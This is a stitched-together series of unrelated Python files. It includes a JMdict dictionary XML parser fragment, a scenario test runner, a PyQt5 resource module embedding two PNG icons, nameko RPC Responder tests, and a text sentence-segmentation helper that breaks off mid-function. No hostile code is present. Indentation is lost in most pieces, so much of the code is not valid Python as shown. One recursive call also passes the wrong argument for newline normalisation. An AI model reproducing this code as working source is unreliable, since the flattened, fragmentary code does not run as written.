# Creating WritingElement instances from <entry><k_ele> tags.
for k_ele in entry_node.iter("k_ele"):
writing_elements.append(
WritingElement(
entry_id=entry_id,
literal=_get_child(k_ele, "keb").text,
priority=[ke_pri.text for ke_pri in k_ele.iter("ke_pri")],
info=[ke_inf.text for ke_inf in k_ele.iter("ke_inf")],
)
)
# Creating ReadingElement instances from <entry><r_ele> tags.
# Also, registering relationships between ReadingElement instances and
# WritingElement literals from <entry><r_ele><re_restr> tags or <re_nokanji/>.
for r_ele in entry_node.iter("r_ele"):
reading_elem = ReadingElement(
entry_id=entry_id,
literal=_get_child(r_ele, "reb").text,
priority=[re_pri.text for re_pri in r_ele.iter("re_pri")],
info=[re_inf.text for re_inf in r_ele.iter("re_inf")],
)
if _has_child(r_ele, "re_nokanji"):
            # This reading does not match any of the writing elements.
reading_writings_mapping[reading_elem] = []
elif _has_child(r_ele, "re_restr"):
# This reading is restricted to some writing elements only.
reading_writings_mapping[reading_elem] = [
re_restr.text for re_restr in r_ele.iter("re_restr")
]
else:
# This reading matches all writing elements.
reading_writings_mapping[reading_elem] = [
w.literal for w in writing_elements
]
    # The mapping's keys are the ReadingElement instances created above.
    reading_elements.extend(reading_writings_mapping.keys())
# Creating ReadingWriting relational instances.
for reading_elem, writing_literals in reading_writings_mapping.items():
reading_writing = [
ReadingWriting(
entry_id=entry_id,
reading_literal=reading_elem.literal,
writing_literal=w,
)
for w in writing_literals
]
readings_writings.extend(reading_writing)
last_parts_of_speech = None
last_misc = None
# Creating Sense-related instances from <entry><sense> tags.
for sense_index, sense_node in enumerate(entry_node.iter("sense"), 1):
new_parts_of_speech = [pos.text for pos in sense_node.iter("pos")]
new_misc = [m.text for m in sense_node.iter("misc")]
# If there are multiple senses, subsequent senses inherit <pos> and <misc> from
# the previous sense UNLESS the sense has defined its own <pos> or <misc> tags.
if last_parts_of_speech is None or new_parts_of_speech:
parts_of_speech = new_parts_of_speech
else:
parts_of_speech = last_parts_of_speech
if last_misc is None or new_misc:
misc = new_misc
else:
misc = last_misc
senses.append(
Sense(
entry_id=entry_id,
index=sense_index,
references=[xref.text for xref in sense_node.iter("xref")],
antonyms=[ant.text for ant in sense_node.iter("ant")],
parts_of_speech=parts_of_speech,
fields=[field.text for field in sense_node.iter("field")],
misc=misc,
dialects=[dial.text for dial in sense_node.iter("dial")],
info=[s_inf.text for s_inf in sense_node.iter("s_inf")],
)
)
# Creating LSource instances from <sense><lsource>.
for lsource_node in sense_node.iter("lsource"):
lsources.append(
LSource(
entry_id=entry_id,
sense_index=sense_index,
text=lsource_node.text,
lang=lsource_node.get(XMLNS + "lang", "eng"),
type=lsource_node.get("ls_type", "full"),
wasei=lsource_node.get("ls_wasei"),
)
)
# Creating Gloss instances from <sense><gloss>.
for gloss_node in sense_node.iter("gloss"):
glosses.append(
Gloss(
entry_id=entry_id,
sense_index=sense_index,
text=gloss_node.text,
lang=gloss_node.get(XMLNS + "lang", "eng"),
gender=gloss_node.get("g_gend"),
type=gloss_node.get("g_type"),
)
)
if _has_child(sense_node, "stagk"):
related_writings = [k.text for k in sense_node.iter("stagk")]
else:
related_writings = [w.literal for w in writing_elements]
if _has_child(sense_node, "stagr"):
related_readings = [r.text for r in sense_node.iter("stagr")]
else:
related_readings = [r.literal for r in reading_elements]
for writing_literal in related_writings:
writings_senses.append(
WritingSense(
entry_id=entry_id,
writing_literal=writing_literal,
sense_index=sense_index,
)
)
for reading_literal in related_readings:
readings_senses.append(
ReadingSense(
entry_id=entry_id,
reading_literal=reading_literal,
sense_index=sense_index,
)
)
return (
entry,
{
"writing_elements": writing_elements,
"reading_elements": reading_elements,
"readings_writings": readings_writings,
"senses": senses,
"lsources": lsources,
"glosses": glosses,
"writings_senses": writings_senses,
"readings_senses": readings_senses,
},
)
def parse(filepath: Union[BinaryIO, str]) -> Generator[Tuple[Entry, dict], None, None]:
tree = etree.parse(filepath)
for node in tree.getroot().iter("entry"):
yield _parse_node(node)
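if __name__ == "__main__":
    # Hedged usage sketch; "JMdict_e.xml" is a hypothetical local copy of the
    # JMdict English XML distribution.
    for entry, related in parse("JMdict_e.xml"):
        print(entry.id, len(related["senses"]), len(related["glosses"]))
        break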
|
"""Definitions and execution supports for scenario testing."""
import contextlib
import os
import pathlib
import shutil
import typing
import yaml
from reviser import definitions
from reviser.definitions import abstracts
from reviser import interactivity
from reviser.tests.scenarios.supports import mocking
from ..supports import validating
class ScenarioRunner:
"""
Execution runner for scenario testing.
This works as a ContextManager within tests to carry out the specified scenario and
return an object with results of the execution for assertion validation.
"""
def __init__(self, slug: str):
"""Create a new ScenarioRunner for the scenario defined by the slug."""
self.slug: str = slug
self.scenario = abstracts.DataWrapper(yaml.safe_load(self.path.read_text()))
self.shell: typing.Optional["interactivity.Shell"] = None
self.error: typing.Optional[Exception] = None
self.patches: typing.Optional[mocking.Patches] = None
@property
def context(self) -> typing.Optional["definitions.Context"]:
"""Get the context object created for the given scenario."""
return self.shell.context if self.shell else None
@property
def configuration(self) -> typing.Optional["definitions.Configuration"]:
"""Get the configuration object created for the given scenario."""
return self.shell.context.configuration if self.shell else None
@property
def path(self) -> pathlib.Path:
"""Get the scenario definition path."""
return pathlib.Path(__file__).parent.parent.joinpath(self.slug).absolute()
@property
def directory(self) -> pathlib.Path:
"""Get the directory in which the scenario definition resides."""
return self.path.parent.absolute()
@property
def commands(self) -> typing.List["abstracts.DataWrapper"]:
"""Get the commands loaded from the scenario to execute."""
raw = self.scenario.get_as_list(
"commands",
default=self.scenario.get_as_list("command"),
)
return [
abstracts.DataWrapper({"command": c} if isinstance(c, str) else c)
for c in raw
]
def run(self) -> "ScenarioRunner":
"""
Execute the scenario.
This will load it if it has not already been loaded via a call to the load
method.
"""
        # Capture the absolute starting directory so the chdir in `finally`
        # actually restores it; a bare Path() is just ".".
        start_directory = pathlib.Path.cwd()
os.chdir(self.directory)
arguments = self.scenario.get_as_list("arguments") or []
try:
with contextlib.ExitStack() as stack:
# Create a stack object that will collect all of the
# patches needed to isolate the tests from external
# environments.
self.patches = mocking.Patches(self, stack)
# Process the shell commands specified in the scenario
# in a non-interactive fashion.
self.shell = interactivity.create_shell(arguments)
commands = [c.get("command") for c in self.commands]
self.shell.command_queue = commands
self.shell.run()
except Exception as error:
self.error = error
finally:
os.chdir(start_directory)
return self
def cleanup(self) -> "ScenarioRunner":
"""Clean up temporary data after a test."""
if self.shell is None:
return self
for t in self.shell.context.configuration.targets:
if t.bundle_directory.exists():
shutil.rmtree(t.bundle_directory)
if t.bundle_zip_path.exists():
os.remove(t.bundle_zip_path)
return self
def check_success(self):
"""Raise an error if the execution process raised an error."""
error = self.error or getattr(self.shell, "error", None)
if error is not None:
raise AssertionError("Command execution failed") from error
    def check_commands(self):
        """
        Iterate over scenario commands and validate the execution results.
        This is carried out against any command that has defined expected
        result values within the command scenario.
        """
commands = self.commands
history = self.shell.execution_history
for command, execution in zip(commands, history):
if command.has("expected"):
validating.assert_command_result(command, execution.result)
def __enter__(self) -> "ScenarioRunner":
"""Begin the context manager state by running the scenario."""
return self.run()
def __exit__(self, exc_type, exc_val, exc_tb) -> None:
"""End the context manager state and clean up execution side effects."""
self.cleanup()
|
# -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.6.2)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x04\x07\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x1d\x00\x00\x00\x1b\x08\x06\x00\x00\x00\x80\xca\x84\x12\
\x00\x00\x00\x01\x73\x52\x47\x42\x00\xae\xce\x1c\xe9\x00\x00\x00\
\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\x00\x00\x00\
\x09\x70\x48\x59\x73\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95\x2b\
\x0e\x1b\x00\x00\x00\x19\x74\x45\x58\x74\x53\x6f\x66\x74\x77\x61\
\x72\x65\x00\x41\x64\x6f\x62\x65\x20\x49\x6d\x61\x67\x65\x52\x65\
\x61\x64\x79\x71\xc9\x65\x3c\x00\x00\x03\x77\x49\x44\x41\x54\x48\
\x4b\xb5\x96\x4d\x48\x54\x51\x14\xc7\xff\x6f\xfc\xd6\x19\xbf\xca\
\x54\x28\xd4\xd0\x8d\x50\x29\x42\x84\x26\x6a\x9b\xa8\x4d\x82\xd4\
\xc6\x85\x66\xa0\x41\xf9\x41\xbb\x4a\x70\x5c\x25\x44\x34\x51\x0b\
\x5b\x98\x16\x04\x11\x06\x4a\xa0\x8b\x08\xb5\xa8\x45\x10\x5a\x0b\
\xa3\x0c\x9a\x12\x32\x33\xfc\x2e\xbf\xe7\x76\xce\x7d\x77\x66\xde\
\x1b\x67\x46\x93\xe6\x37\xdc\x77\xef\x39\xef\xcc\x3b\xef\xdd\x73\
\xee\xb9\x57\x13\x04\x7c\x58\x77\x4e\x60\x65\x70\x18\x1b\xce\x1f\
\x4a\xb3\x3d\xc2\x32\xd3\x10\x99\x97\x83\x08\x6a\xc1\x30\x39\x65\
\x67\xf3\xf6\x7b\xf8\x73\xbf\x5f\x69\x76\x86\x25\xc1\x8a\xd8\xea\
\x13\xb0\x36\x9d\x41\x78\x66\xba\xd2\x7a\xf1\x38\x5d\x1b\x19\xc3\
\x54\x69\x3d\x5c\x73\x8b\xf2\xc6\xff\x22\xbe\xa5\x06\xf1\xf6\x1a\
\x25\xe9\x48\xa7\xa1\x72\xe8\x26\xe2\x50\x36\x52\x06\xef\xc0\x92\
\x68\x95\xb2\x74\x3a\x99\x57\x8d\xb5\x77\x9f\xa5\x22\x54\x18\x1d\
\x5b\x38\x61\x02\x39\x0c\xcb\x48\x93\xc6\xc1\xd8\x8e\x0d\xc3\x3e\
\xa6\x4a\x2f\xca\xb1\x65\xa9\xe7\x85\x1c\xf8\x92\x78\xb3\x01\xe9\
\xce\x6e\xa4\x8e\x74\x21\x75\xb8\x53\x26\x87\x2f\x49\x9d\x57\x3c\
\x36\x29\x03\xb7\xfd\xda\x18\x61\xc7\x9c\xa8\x16\x8e\xa7\x2f\x31\
\xa7\x8a\x65\xe6\xb9\xe1\x25\x90\xe0\x68\x50\x12\x33\x83\x66\xbc\
\x82\xf5\x6c\x2f\xdc\x79\x1e\x55\x9a\x2f\x33\x76\x2b\xe6\x5b\xc9\
\x29\x30\x87\x0e\x7a\xc0\x3e\x43\xdb\xdd\xdb\x06\x4d\xab\xf3\x3c\
\x90\xf1\x4d\x7d\x4d\xf5\x3a\xfd\xa8\xd3\x34\x24\xdd\x7a\x8e\x01\
\xa5\x09\x86\x25\x2c\x73\x8f\x1a\x06\x87\x63\x6f\x64\x43\xf5\x66\
\xbc\xc5\xc4\x89\xf7\xf2\x03\xca\xb1\xac\x34\x5e\x2c\x89\x8e\x2a\
\x44\xa4\xf0\xd0\x06\xbb\xed\x38\xe6\x5a\x3a\xc0\x4b\x57\x88\xbb\
\x70\x4f\xd6\xa2\xe3\xb1\x9c\x16\x23\x2e\x79\x7d\x43\x55\x6b\x02\
\xae\xd9\x62\x5c\xa7\xff\x8d\x23\x12\x65\x52\xbf\x05\x42\x8c\x09\
\x47\x21\xa8\x40\x14\x0a\xc7\x18\x2f\x20\x9d\xd5\xe1\x4f\xe2\x7b\
\x46\x85\x18\x47\x11\xb5\x5c\x51\x49\xa6\x6c\x4e\x2f\x47\xe3\x2c\
\x25\xa7\x89\x07\xa6\xfb\x2c\x17\x08\xbb\xc7\xd6\xdb\x2a\xa5\x9d\
\xde\x28\xa6\x6e\x5e\xa3\x29\x47\xa3\x58\xea\xad\xf0\x58\x3d\x36\
\xbe\xf2\x74\x2d\x53\xcc\x47\xf1\x50\x37\x22\x16\x68\xfc\x45\xc9\
\xe1\x88\xaa\xa2\x72\xd7\x78\xd4\x27\xc6\xc1\x31\x38\x35\x23\x66\
\x7e\xa9\xd1\x34\x9e\xca\x3e\x0d\xf4\x55\x34\x85\xdc\xb2\x50\x20\
\x75\xa5\xb0\x75\x5d\x45\xa2\xa3\x1c\x31\x52\x8e\xa7\x16\x8d\x73\
\x64\xf3\x92\xc2\xc5\x14\xd0\x8f\xff\xd3\x26\x25\x1d\x83\xd3\x42\
\xd0\xf4\xaa\x78\x0a\xf4\x97\x1c\x51\xfa\x25\xbc\x95\x7d\xb2\x21\
\x5e\x31\x38\x20\xfb\x58\x79\x65\xf4\x2f\xdd\x2f\xaf\x5b\x21\x9d\
\x8a\x35\xbe\x2e\x62\xe3\x83\x77\xcd\xee\xea\x69\x43\x2c\x4d\x5d\
\xd4\xe1\x6c\xf5\x55\xd3\x9e\xe5\xe0\xa4\x17\x19\x55\x63\x33\x71\
\xaa\xdf\x82\xd5\xe1\x67\xc2\x1e\xbe\x39\xf0\xde\xc4\x1a\x13\x37\
\x0e\xfa\xbb\xcf\xad\x56\xf4\xb1\x09\x5d\x6b\xa5\x5c\xa1\x12\xab\
\x48\xd0\xf4\x9a\x6c\x4d\x89\x34\xdf\xd2\x4d\x1b\x29\xa9\x03\x92\
\x8d\x4b\x4f\xfa\x50\xe3\x29\xaf\x36\x54\x22\x17\xd7\xf6\x2a\x31\
\x00\x99\xb4\x4a\x29\xa3\x15\x36\x18\xb7\x75\xed\x67\xc9\x05\xb1\
\x32\x34\xa2\x44\x1d\x7f\x7b\x20\x17\x87\xa9\xb2\x7a\x25\x6d\xcf\
\x26\x10\x7e\xb3\xd7\xdf\x26\xe0\x5b\x91\xfc\xd5\xec\x40\x9b\x87\
\x11\xde\x14\xc2\x9a\xab\xcf\xdb\x57\x86\xcc\x0f\x74\x4d\x4e\xcb\
\xa3\x8b\x7e\xd6\xd1\xf0\xbb\xbd\x07\x73\x97\xdb\xf5\x9b\x8a\xf5\
\x8f\xdf\x64\xcf\x36\x62\x79\x55\xda\xcc\xb7\x76\x4a\x5d\x30\x92\
\x1f\xb5\x42\xe3\xca\x33\x99\x7f\x56\xa9\x42\x0b\xaf\x86\x64\x5a\
\xd7\x16\x7e\x53\xde\xca\x42\x8d\xdb\x21\x23\x8f\x2b\xae\xd9\x45\
\xb9\xab\x87\xea\xc8\x62\x6d\x3c\x4d\x55\xab\x51\x49\xca\x29\x0f\
\x42\xe1\x98\x8f\x32\xec\x2c\xa6\xdc\x3c\x93\x1e\xa7\x6e\x78\x1b\
\x5b\xa0\xa6\x17\xfb\x7f\x87\xb3\x93\x4f\x11\xd1\xe4\x28\xae\xfa\
\xa4\xd2\x9a\xd9\xe4\xd4\x0d\x67\xef\x4e\x4e\xf8\xfe\x0e\xd7\x66\
\x80\xbf\x48\x3f\xa7\x8a\x10\x85\x4b\x59\x00\x00\x00\x00\x49\x45\
\x4e\x44\xae\x42\x60\x82\
\x00\x00\x04\x1f\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x1d\x00\x00\x00\x1b\x08\x06\x00\x00\x00\x80\xca\x84\x12\
\x00\x00\x00\x01\x73\x52\x47\x42\x00\xae\xce\x1c\xe9\x00\x00\x00\
\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\x00\x00\x00\
\x09\x70\x48\x59\x73\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95\x2b\
\x0e\x1b\x00\x00\x00\x19\x74\x45\x58\x74\x53\x6f\x66\x74\x77\x61\
\x72\x65\x00\x41\x64\x6f\x62\x65\x20\x49\x6d\x61\x67\x65\x52\x65\
\x61\x64\x79\x71\xc9\x65\x3c\x00\x00\x03\x8f\x49\x44\x41\x54\x48\
\x4b\xb5\x96\x5d\x6c\x4c\x51\x10\xc7\xff\xf7\x56\x55\xe9\x56\x5b\
\x4a\x25\x42\x35\x25\xd2\xf8\x6e\x48\x2d\x1b\x8d\x48\x84\x88\x2d\
\x12\x0f\x1a\x55\x5e\x44\x28\x52\x89\x17\xc2\xc6\x0b\x89\x44\x96\
\x78\xf1\x80\xaa\x78\x11\x5f\x1b\xa2\x4f\xc4\xf7\x47\xa5\x8a\x48\
\x89\x26\xb5\x48\xb4\xbe\x5a\xad\xc6\x77\x7b\xcc\x9c\x3b\xbb\x7b\
\xf7\xda\x5d\x25\xf6\xb7\x39\xf7\x9c\x99\x3b\xbb\xb3\xe7\x9c\x99\
\x39\xc7\x50\x04\x1c\xfc\x0c\xb6\xe2\xdb\x95\x46\xf4\x04\xdb\x44\
\xd3\x37\x52\xf2\xf3\xd0\x7f\xca\x58\xa4\x52\x4b\x44\x94\x53\x76\
\xd6\xe5\x3b\x82\xe9\x4b\xef\x88\xe6\xdf\xb8\x5e\xf1\x03\x03\x2b\
\x17\x20\x63\xf3\x72\xf4\xcb\x1f\x21\xda\x08\x61\xa7\x3f\x1e\x34\
\xe3\x5d\x69\x15\x3c\xb5\xa9\xfa\xc5\xff\xa2\xf1\xfe\x12\x64\xfa\
\xd6\x88\x64\x61\xf2\x23\x59\x0e\x99\xa9\xd3\xce\xe2\xcd\x94\x4a\
\xf4\x7e\xec\x16\x8d\xcc\x94\x95\xee\x5d\x1f\x44\x95\x1c\x6e\xed\
\x18\x82\xdc\x2b\x07\x61\x66\x65\xc0\xe4\x80\x89\xe7\xf0\xc6\xc6\
\x34\x6d\x9c\x88\xbe\xd8\x30\xec\xe3\x5d\xe9\x06\x3d\x36\xbf\x9c\
\xbb\xa6\x07\x4e\x1e\xb6\xac\xc4\x88\xe0\x29\x0c\x7f\x50\x83\xa7\
\xa3\xf6\xe9\xe0\x70\xf2\xa8\x7d\x5d\xd8\xa6\x29\x73\x57\x4c\x1b\
\x3b\xec\x98\x03\xd5\xe4\xfd\x74\x52\x7f\x64\x82\x8e\xbc\x10\x9c\
\x02\x83\xfd\x1b\x45\x02\xae\x7a\x5b\xe0\xf1\x5e\x40\xc6\xea\x00\
\xea\x44\x97\x56\x3a\x55\x47\xec\x9f\xe0\x3d\xa6\x40\xea\x44\x05\
\xfd\x40\x8b\xad\x0d\x0d\xec\x81\x61\xac\x0d\xff\x20\xe3\x0c\x7d\
\x43\x7a\x8b\x3a\xac\x35\x0c\x64\xef\xbf\x04\x9f\xb7\x43\x74\xf1\
\x31\x53\xf2\x87\xc9\x30\x31\xbc\xf7\x76\x7a\xa4\x8f\x26\x52\x4c\
\x8e\x79\xaf\xea\x09\x64\x7b\x5b\x45\x13\xc1\xcc\xf2\xaf\x42\x6a\
\x2e\x0f\x5d\xf0\xb9\xe6\xa3\x73\xe7\x61\x70\xea\x2a\x75\x08\xa1\
\xc5\xea\xf6\x9f\xd4\xcb\x62\xa7\x57\x3f\xeb\xa9\x6a\xb5\x52\x3a\
\x78\xb0\x97\xbe\x57\x10\x18\x0e\x5f\x20\x5b\xbf\x49\x88\x52\xcd\
\xca\xef\x06\x15\x08\xb7\xf2\x37\x73\x02\x59\x7c\x6f\x7c\xa6\x5e\
\x8f\x5e\xa6\x5e\x61\x16\xb5\x22\x55\x4e\xa6\x6c\x4e\x7f\x8e\xc6\
\x63\x44\xce\x53\xb5\x51\xef\x59\x2e\x56\xbe\xb0\x6d\xa4\x95\x93\
\x5d\x41\x60\x91\x6e\xba\x38\x58\xdc\xc2\xe6\xb1\x06\xed\xa5\xd5\
\xdc\x73\xab\x30\xfb\xc0\x37\xd2\x7f\xc5\x61\x34\xe1\x84\x65\x44\
\x7c\xa2\xf1\x73\x91\xfb\x21\x6d\x15\x95\xbb\x4d\xb3\x1d\x7b\x9c\
\x18\x9b\xd3\x68\x54\xc7\x7b\x19\xb5\xe3\xbc\xee\xf3\x40\xb3\xa2\
\x25\x5c\x84\x57\x18\x83\x62\xad\x2b\x85\xab\x66\x1b\xb2\xfc\x65\
\x48\xd7\x72\x26\xb5\x01\xa8\x25\x1b\xb6\x63\x8a\xe9\xc3\xe3\xdb\
\xb6\x65\xb7\x39\x75\x83\x96\x57\xf6\x53\xa1\x6e\x4e\x89\xe8\xbf\
\xa0\x41\xf7\x39\xb6\xfd\x4a\xc7\x44\xdd\x0f\xd4\x4f\xc6\x9a\x69\
\x81\x7e\xfe\x09\xed\x54\xe9\x9c\xee\x46\xcf\x93\x48\xce\x0e\x39\
\xb7\x07\xf7\xce\x94\x20\x6d\x46\xa1\xcc\xaa\x3d\x9c\x0e\x41\xfa\
\x23\x4d\x7a\xe4\x64\x90\xf4\x89\xa1\xe2\x10\x44\xa7\xce\x86\x47\
\xd8\xb2\x78\x5c\x78\x4f\x53\xb2\xe7\xe3\xf8\xf6\x6d\xc8\xbd\x7b\
\x14\x2b\x26\xf1\xfb\x36\x54\xe0\xa6\x4e\x03\x0f\xed\x69\x3d\xab\
\xfa\x40\x03\x7d\xf8\x3b\x33\x6d\xf9\x6b\x76\xed\x3c\x45\x07\xa9\
\x48\x31\x29\x44\xf5\xe9\x8b\x58\x53\x28\x22\xa5\x56\x39\x8a\xb0\
\x7b\xa4\x88\x71\xe0\xaa\x45\x11\x2d\xb8\x60\x3f\xd6\x8d\xb7\x73\
\xd6\xab\x92\xea\x17\x22\x5a\xc4\x3a\x03\xb9\x38\x14\x75\xed\x10\
\xa9\x6f\x36\xf1\x88\x19\xbd\xb1\x0e\x01\x67\x45\x8a\x55\xb3\xe3\
\x1d\x1e\x76\xf8\x50\x30\xa8\x02\x29\x67\xb5\x61\x38\x88\x78\x26\
\x66\x96\x0b\x9f\x6b\x2e\x62\x72\xc1\x71\x79\x13\x81\x67\x1b\x3a\
\x18\xe2\xd9\x38\x79\xdc\xbb\x15\x06\x57\x9e\xf1\x2f\xab\x45\x95\
\x5c\x78\x22\x39\x94\xd7\x26\x1f\x5b\x7c\x94\x25\x9b\x90\x43\x46\
\x5f\x57\xf8\xfe\xc2\xa7\x7a\xb2\xae\x2c\x0d\x97\xe7\x51\xd5\xda\
\x24\x92\x38\xe5\x41\x32\x1c\xf3\x55\x86\x9d\xa5\x97\x79\x44\x63\
\x11\x75\xef\x65\xf8\x18\xfb\x44\xcd\x2a\xf6\x7f\x0f\x47\x27\xdf\
\x22\x06\x90\xa3\x41\x95\x0b\x45\x1b\xcd\x6f\x4e\x43\xf0\xc5\xfb\
\x5f\x6e\xf8\xb1\x2e\xd7\xd1\x00\xbf\x00\x6c\x66\x9a\x10\xcc\xeb\
\xeb\xb8\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
"
qt_resource_name = b"\
\x00\x07\
\x07\x3b\xe0\xb3\
\x00\x70\
\x00\x6c\x00\x75\x00\x67\x00\x69\x00\x6e\x00\x73\
\x00\x15\
\x02\x94\x3a\xde\
\x00\x45\
\x00\x64\x00\x69\x00\x74\x00\x33\x00\x44\x00\x69\x00\x53\x00\x63\x00\x68\x00\x65\x00\x6d\x00\x61\x00\x74\x00\x69\x00\x73\x00\x61\
\x00\x74\x00\x69\x00\x6f\x00\x6e\
\x00\x0d\
\x01\x40\x1d\x27\
\x00\x65\
\x00\x64\x00\x69\x00\x74\x00\x5f\x00\x69\x00\x63\x00\x6f\x00\x6e\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x11\
\x00\xed\x45\x27\
\x00\x73\
\x00\x74\x00\x6f\x00\x70\x00\x65\x00\x64\x00\x69\x00\x74\x00\x5f\x00\x69\x00\x63\x00\x6f\x00\x6e\x00\x2e\x00\x70\x00\x6e\x00\x67\
\
"
qt_resource_struct = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x14\x00\x02\x00\x00\x00\x02\x00\x00\x00\x03\
\x00\x00\x00\x64\x00\x00\x00\x00\x00\x01\x00\x00\x04\x0b\
\x00\x00\x00\x44\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
"
def qInitResources():
QtCore.qRegisterResourceData(
0x01, qt_resource_struct, qt_resource_name, qt_resource_data
)
def qCleanupResources():
QtCore.qUnregisterResourceData(
0x01, qt_resource_struct, qt_resource_name, qt_resource_data
)
qInitResources()
|
def step_up1():
    """Straightforward implementation: keep track of how many levels we
    need to ascend, and stop when this count is zero."""
    deficit = 1
    while deficit > 0:
        if step():
            deficit -= 1
        else:
            deficit += 1
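# step_up1 assumes an externally supplied step() primitive, e.g.:
#
# def step():
#     """Attempt one step up; return True if it succeeded, False if we
#     slipped down a step instead."""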
|
"""Python bindings to the libopus, IETF low-delay audio codec"""
|
import pytest
from mock import ANY, Mock
from nameko.rpc import Responder
# python version compat
EXCEPTION_MODULE = Exception.__module__
@pytest.yield_fixture
def unserializable():
def unserializable_inner():
pass # pragma: no cover
yield unserializable_inner
@pytest.fixture
def message():
message = Mock()
message.properties = {'reply_to': '', 'content_type': 'application/json'}
return message
def test_responder(message, mock_producer):
exchange = Mock()
responder = Responder('amqp://localhost', exchange, 'json', message)
# serialisable result
result, exc_info = responder.send_response(True, None)
assert result is True
assert exc_info is None
expected_msg = {
'result': True,
'error': None
}
(msg,), _ = mock_producer.publish.call_args
assert msg == expected_msg
def test_responder_worker_exc(message, mock_producer):
exchange = Mock()
responder = Responder('amqp://localhost', exchange, 'json', message)
# serialisable exception
worker_exc = Exception('error')
result, exc_info = responder.send_response(
None, (Exception, worker_exc, "tb"))
assert result is None
assert exc_info == (Exception, worker_exc, "tb")
expected_msg = {
'result': None,
'error': {
'exc_path': '{}.Exception'.format(EXCEPTION_MODULE),
'value': 'error',
'exc_type': 'Exception',
'exc_args': ['error']
}
}
(msg,), _ = mock_producer.publish.call_args
assert msg == expected_msg
@pytest.mark.parametrize("serializer,content_type,exception_info_string", [
('json', 'application/json', "is not JSON serializable"),
('pickle', 'application/x-python-serialize', "Can't pickle")])
def test_responder_unserializable_result(
message, mock_producer, unserializable,
serializer, content_type, exception_info_string):
message.properties['content_type'] = content_type
exchange = Mock()
responder = Responder('amqp://localhost', exchange, serializer, message)
# unserialisable result
worker_result = unserializable
result, exc_info = responder.send_response(worker_result, None)
# responder will return the error from the serializer
assert result is None
# Different kombu versions return different exceptions, so
# testing for the concrete exception is not feasible
assert exc_info == (ANY, ANY, ANY)
assert exception_info_string in str(exc_info[1])
# and publish a dictionary-serialized UnserializableValueError
# on worker_result
expected_msg = {
'result': None,
'error': {
'exc_path': 'nameko.exceptions.UnserializableValueError',
'value': 'Unserializable value: `{}`'.format(worker_result),
'exc_type': 'UnserializableValueError',
'exc_args': [],
}
}
(msg,), _ = mock_producer.publish.call_args
assert msg == expected_msg
def test_responder_cannot_unicode_exc(message, mock_producer):
exchange = Mock()
responder = Responder('amqp://localhost', exchange, 'json', message)
class CannotUnicode(object):
def __str__(self):
raise Exception('error')
# un-unicode-able exception
worker_exc = Exception(CannotUnicode())
# send_response should not throw
responder.send_response(True, (Exception, worker_exc, "tb"))
def test_responder_cannot_repr_exc(message, mock_producer):
exchange = Mock()
responder = Responder('amqp://localhost', exchange, 'json', message)
class CannotRepr(object):
def __repr__(self):
raise Exception('error')
# un-repr-able exception
worker_exc = Exception(CannotRepr())
# send_response should not throw
responder.send_response(True, (Exception, worker_exc, "tb"))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Sentence and token/word segmentation utilities like Tokenizer"""
from __future__ import division, print_function, absolute_import # , unicode_literals
from future import standard_library
standard_library.install_aliases() # noqa
from builtins import ( # noqa
bytes, dict, int, list, object, range, str, ascii, chr, hex, input, next, oct, open,
pow, round, super, filter, map, zip)
from past.builtins import basestring
import os
import re
from itertools import chain
import logging
from .detector_morse import Detector
from .detector_morse import slurp
from .futil import find_files
from .constants import DATA_PATH
from .futil import generate_files
from .segmentation import * # noqa
# from .penn_treebank_tokenizer import word_tokenize
logger = logging.getLogger(__name__)
try:
from nlup import BinaryAveragedPerceptron
except ImportError:
logger.error("detector_morse disabled because Kyle Gorman's nlup sentence boundary detector has not been installed.")
class BinaryAveragedPerceptron:
pass
# TODO: break this up
def generate_sentences(text='', train_path=None, case_sensitive=True, ext=['.md', '.txt', '.asc', '.asciidoc'],
normalize_ordinals=1, normalize_newlines=1, normalize_sentence_boundaries=1,
epochs=20, classifier=BinaryAveragedPerceptron,
re_eol=r'\r\n|\r|\n', **kwargs):
"""Generate sentences from a sequence of characters (text)
Wrapped text (newlines at column 80, for instance) will break this, breaking up sentences.
Wrapper and preprocessor for Kyle Gorman's "DetectorMorse" module
Arguments:
preprocess (bool): whether to assume common sentence delimitters in markdown and asciidoc formatting
using r'[.?!][ \t]*\n\n|[.?!][ \t]*\r\n\r\n|[.?!][ \t]*\r\r|[.?!][ ][ ][A-Z]'
case_sensitive (int): whether to consider case to make decisions about sentence boundaries
epochs (int): number of epochs (iterations for classifier training)
"""
ext = [ext] if isinstance(ext, basestring) else ext
if isinstance(text, basestring) and len(text) <= 256:
if os.path.isfile(text) and os.path.splitext(text)[-1].lower() in ext:
text = open(text)
elif os.path.isdir(text):
return chain.from_iterable((
generate_sentences(text=stat['path'], train_path=train_path, ext=ext,
normalize_ordinals=normalize_ordinals, normalize_newlines=normalize_ordinals,
normalize_sentence_boundaries=normalize_sentence_boundaries,
epochs=epochs, classifier=classifier, re_eol=re_eol, **kwargs)
for stat in find_files(text, ext=ext)))
if isinstance(text, basestring):
texts = Split(text=text, re_delim=re_eol)
else:
        texts = chain.from_iterable(Split(text=doc, re_delim=re_eol) for doc in text)
if normalize_newlines:
re_eol = re.compile(r'\r\n|\r')
texts = (re_eol.sub(r'\n', doc) for doc in texts)
if normalize_ordinals:
re_ord = re.compile(r'\b([0-9]+|[A-Za-z])[.?!][ \t]{1,4}([A-Za-z])')
texts = (re_ord.sub(r'\1) \2', doc) for doc in texts)
if normalize_sentence_boundaries:
